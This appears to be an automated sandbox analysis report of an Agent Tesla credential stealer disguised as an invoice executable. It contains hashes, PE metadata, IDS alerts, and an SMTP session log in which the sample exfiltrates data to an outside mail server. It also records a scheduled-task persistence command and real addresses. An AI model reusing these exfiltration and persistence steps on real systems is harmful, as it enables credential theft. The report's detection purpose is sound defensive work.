                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):835
                                        Entropy (8bit):4.694294591169137
                                        Encrypted:false
                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                        MD5:6EB47C1CF858E25486E42440074917F2
                                        SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                        SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                        SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                        Malicious:true
                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
                                        Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1141
                                        Entropy (8bit):4.44831826838854
                                        Encrypted:false
                                        SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                        MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                        SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                        SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                        SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                        Malicious:false
                                        Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.486735500072679
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:INVOICE OUTSTANDING.exe
                                        File size:1031168
                                        MD5:0fa9d94d6393235f67a17b220902dbfa
                                        SHA1:3c0ae56ab072f622da13806b4336f01f7137ee4c
                                        SHA256:65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
                                        SHA512:1c2d817addc45161e63667895e1c54306e5f8f27f4804d6d7a06163b62451b3189e7fa6608b24bb7dd8969b23285286e82750351f1322b2714a31546fab9b5c5
                                        SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
                                        TLSH:2D25E0A069EC715AE03912B132F064EA57F6AC37C914D22C7D96B76F87B3EC100A3593
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@................................
                                        Icon Hash:f9c9a99884c2d218
                                        Entrypoint:0x4ce656
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x62F102BE [Mon Aug 8 12:34:06 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the preceding instruction is repeated 68 times in the listing shown here; it is the disassembly of 00 00 byte pairs following the entry-point stub)
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xce604 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd0000 | 0x2ee1c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x100000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xcc65c | 0xcc800 | False | 0.8614224384932763 | data | 7.770423052382821 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd0000 | 0x2ee1c | 0x2f000 | False | 0.3779141040558511 | data | 5.52480890734526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x100000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xd02b0 | 0x6e15 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0xd70c8 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0xe78f0 | 0x94a8 | data | |
RT_ICON | 0xf0d98 | 0x5488 | data | |
RT_ICON | 0xf6220 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 12648447, next used block 2130706432 | |
RT_ICON | 0xfa448 | 0x25a8 | data | |
RT_ICON | 0xfc9f0 | 0x10a8 | data | |
RT_ICON | 0xfda98 | 0x988 | data | |
RT_ICON | 0xfe420 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0xfe888 | 0x84 | data | |
RT_VERSION | 0xfe90c | 0x324 | data | |
RT_MANIFEST | 0xfec30 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/08/22-20:20:11.732977 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49763 | 587 | 192.168.2.3 | 43.255.154.57
08/08/22-20:20:11.733160 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49763 | 587 | 192.168.2.3 | 43.255.154.57
08/08/22-20:20:11.733160 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49763 | 587 | 192.168.2.3 | 43.255.154.57
08/08/22-20:20:11.732977 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 20:20:08.485892057 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:08.739192009 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:08.739322901 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:09.421390057 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:09.421747923 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:09.675313950 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:09.759871006 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:09.849378109 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.103190899 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:10.117631912 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.390836954 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:10.438348055 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.691970110 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:10.692256927 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.985178947 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.047105074 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.150580883 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.445415020 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.698849916 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.698982954 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.732976913 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.733160019 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.733853102 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.733959913 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.986447096 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.987082005 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.989464998 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:12.150705099 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 20:20:08.416261911 CEST | 63332 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 20:20:08.437103987 CEST | 53 | 63332 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 8, 2022 20:20:08.416261911 CEST | 192.168.2.3 | 8.8.8.8 | 0x1581 | Standard query (0) | mail.oceanskylogistics.in | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 8, 2022 20:20:08.437103987 CEST | 8.8.8.8 | 192.168.2.3 | 0x1581 | No error (0) | mail.oceanskylogistics.in | | 43.255.154.57 | A (IP address) | IN (0x0001)
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Aug 8, 2022 20:20:09.421390057 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 220-sg2plcpnl0242.prod.sin2.secureserver.net ESMTP Exim 4.94.2 #2 Mon, 08 Aug 2022 11:20:09 -0700
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Aug 8, 2022 20:20:09.421747923 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57 | EHLO 320946
Aug 8, 2022 20:20:09.675313950 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 250-sg2plcpnl0242.prod.sin2.secureserver.net Hello 320946 [102.129.143.3]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-CHUNKING
    250-STARTTLS
    250-SMTPUTF8
    250 HELP
Aug 8, 2022 20:20:09.849378109 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57 | AUTH login aW1wb3J0QG9jZWFuc2t5bG9naXN0aWNzLmlu
Aug 8, 2022 20:20:10.103190899 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 334 UGFzc3dvcmQ6
Aug 8, 2022 20:20:10.390836954 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 235 Authentication succeeded
Aug 8, 2022 20:20:10.438348055 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57 | MAIL FROM:<import@oceanskylogistics.in>
Aug 8, 2022 20:20:10.691970110 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 250 OK
Aug 8, 2022 20:20:10.692256927 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57 | RCPT TO:<ajay@mbff.co.in>
Aug 8, 2022 20:20:11.047105074 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 250 Accepted
Aug 8, 2022 20:20:11.445415020 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57 | DATA
Aug 8, 2022 20:20:11.698982954 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
Aug 8, 2022 20:20:11.733959913 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57 | .
Aug 8, 2022 20:20:11.989464998 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 250 OK id=1oL7MJ-00GBzl-Gn


Target ID: 0
Start time: 20:20:10
Start date: 08/08/2022
Path: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
Imagebase: 0xa30000
File size: 1031168 bytes
MD5 hash: 0FA9D94D6393235F67A17B220902DBFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 2
Start time: 20:20:21
Start date: 08/08/2022
Path: C:\Windows\System32\BackgroundTransferHost.exe
Wow64 process (32bit): false
Commandline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Imagebase: 0x7ff6c2f90000
File size: 36864 bytes
MD5 hash: 02BA81746B929ECC9DB6665589B68335
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 12
Start time: 20:20:38
Start date: 08/08/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
Imagebase: 0xe60000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 13
Start time: 20:20:40
Start date: 08/08/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 14
Start time: 20:20:41
Start date: 08/08/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xf30000
File size: 45152 bytes
MD5 hash: 2867A3817C9245F7CF518524DFD18F28
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 18
Start time: 20:21:02
Start date: 08/08/2022
Path: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
Imagebase: 0x990000
File size: 45152 bytes
MD5 hash: 2867A3817C9245F7CF518524DFD18F28
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: high

Target ID: 19
Start time: 20:21:03
Start date: 08/08/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 20
Start time: 20:21:11
Start date: 08/08/2022
Path: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
Imagebase: 0x510000
File size: 45152 bytes
MD5 hash: 2867A3817C9245F7CF518524DFD18F28
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 21
Start time: 20:21:11
Start date: 08/08/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

                                        No disassembly